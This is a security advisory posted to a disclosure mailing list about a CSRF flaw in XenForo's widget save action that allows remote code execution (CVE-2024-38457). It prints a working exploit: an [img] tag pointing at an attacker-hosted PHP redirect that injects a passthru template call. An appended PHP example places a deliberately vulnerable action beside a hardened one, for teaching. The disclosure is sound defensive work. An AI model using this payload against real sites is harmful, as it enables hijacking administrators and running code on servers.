Message-ID: <CAJeQoQdiNSqh_ROuSgYbGi1KHME0z6AQR=PmMMGY8GLZoGb__Q@mail.gmail.com>
Date: Tue, 16 Jul 2024 15:58:13 +0200
From: Egidio Romano <n0b0d13s@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] [KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability

-------------------------------------------------------------------------------
XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
-------------------------------------------------------------------------------

[-] Software Link:

https://xenforo.com

[-] Affected Versions:

Version 2.2.15 and prior versions.

[-] Vulnerability Description:

The XF\Admin\Controller\Widget::actionSave() method, defined in the /src/XF/Admin/Controller/Widget.php script, does not check whether the current HTTP request is a POST or a GET before saving a widget. XenForo performs anti-CSRF checks for POST requests only, so this method can be abused in a Cross-Site Request Forgery (CSRF) attack to create or modify arbitrary XenForo widgets via GET requests. This can also be exploited in tandem with KIS-2024-06 to perform CSRF-based Remote Code Execution (RCE) attacks.
Furthermore, XenForo implements a BB code system, so this vulnerability could also be exploited through "Stored CSRF" attacks by abusing the [img] BB code tag, creating a thread or a private message (to be sent to the victim user) like the following:

[img]https://attacker.website/exploit.php[/img]

Where the exploit.php script hosted on the attacker-controlled website could be something like this:

<?php
$url = "https://victim.website/xenforo/";
header("Location: {$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");
?>

Successful exploitation of this vulnerability requires a victim user with permissions to administer styles or widgets to be currently logged into the Admin Control Panel.

[-] Solution:

Update to a fixed version or apply the vendor patches.

[-] Disclosure Timeline:

[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure
[05/06/2024] - Vendor released patches and fixed versions
[14/06/2024] - CVE identifier requested
[16/06/2024] - CVE identifier assigned
[16/07/2024] - Coordinated public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2024-38457 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://xenforo.com/community/threads/222133
https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-05
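The root cause described above is a state-changing action whose CSRF check is gated on the request method, so that a GET request (the method a browser uses to fetch an [img] URL and follow its redirect, cookies included) reaches the save logic without any token. The following PHP is an added illustration written for this page, not XenForo's code or the vendor's patch: a minimal widget "save" action in the defective shape beside its hardened form. The parameter name csrf_token, the saveWidget() stand-in and the sample request arrays are all constructed for the example.

```php
<?php
// Added example, not XenForo's own code: a minimal "save widget" action
// written twice. The first mirrors the defect described in the advisory
// (the CSRF token is only verified when the method is POST, so a GET
// bypasses it); the second is the hardened form. All names here
// (csrf_token, saveWidget, the request arrays) are constructed.

function csrfTokenIsValid(array $request, array $session): bool
{
    if (!isset($request['csrf_token'], $session['csrf_token'])
        || !is_string($request['csrf_token'])) {
        return false;
    }
    // Constant-time comparison of the submitted token with the session token.
    return hash_equals($session['csrf_token'], $request['csrf_token']);
}

function saveWidget(array $request): string
{
    // Stand-in for persisting the widget; only reports what would be saved.
    return 'saved widget ' . ($request['widget_key'] ?? '(none)');
}

// Vulnerable pattern: the token check is gated on the method while the save
// itself runs for any method, so a cross-site image or link (always a GET,
// always sent with the victim's session cookie) reaches saveWidget().
function actionSaveVulnerable(string $method, array $request, array $session): string
{
    if ($method === 'POST' && !csrfTokenIsValid($request, $session)) {
        return 'rejected: bad CSRF token';
    }
    return saveWidget($request);
}

// Hardened pattern: a state-changing action accepts POST only, and once the
// method is right the token is always verified before anything is written.
function actionSaveHardened(string $method, array $request, array $session): string
{
    if ($method !== 'POST') {
        return 'rejected: POST required';
    }
    if (!csrfTokenIsValid($request, $session)) {
        return 'rejected: bad CSRF token';
    }
    return saveWidget($request);
}

// Constructed sample data: the session of a logged-in administrator and the
// parameters of a forged GET request, which carries no token.
$session        = ['csrf_token' => bin2hex(random_bytes(16))];
$forgedGet      = ['definition_id' => 'html', 'widget_key' => 'example'];
$legitimatePost = $forgedGet + ['csrf_token' => $session['csrf_token']];

echo actionSaveVulnerable('GET', $forgedGet, $session), PHP_EOL;
echo actionSaveHardened('GET', $forgedGet, $session), PHP_EOL;
echo actionSaveHardened('POST', $forgedGet, $session), PHP_EOL;
echo actionSaveHardened('POST', $legitimatePost, $session), PHP_EOL;
```

Run it with the PHP CLI. The forged GET is accepted by the vulnerable action, which is exactly the defect, while the hardened action refuses it on method, refuses a tokenless POST on the token check, and accepts only the request that carries the session's token. The same rule generalizes to every admin action that writes state: require POST (or another non-safe method) first, then verify the token unconditionally, rather than letting the method choose whether the check runs.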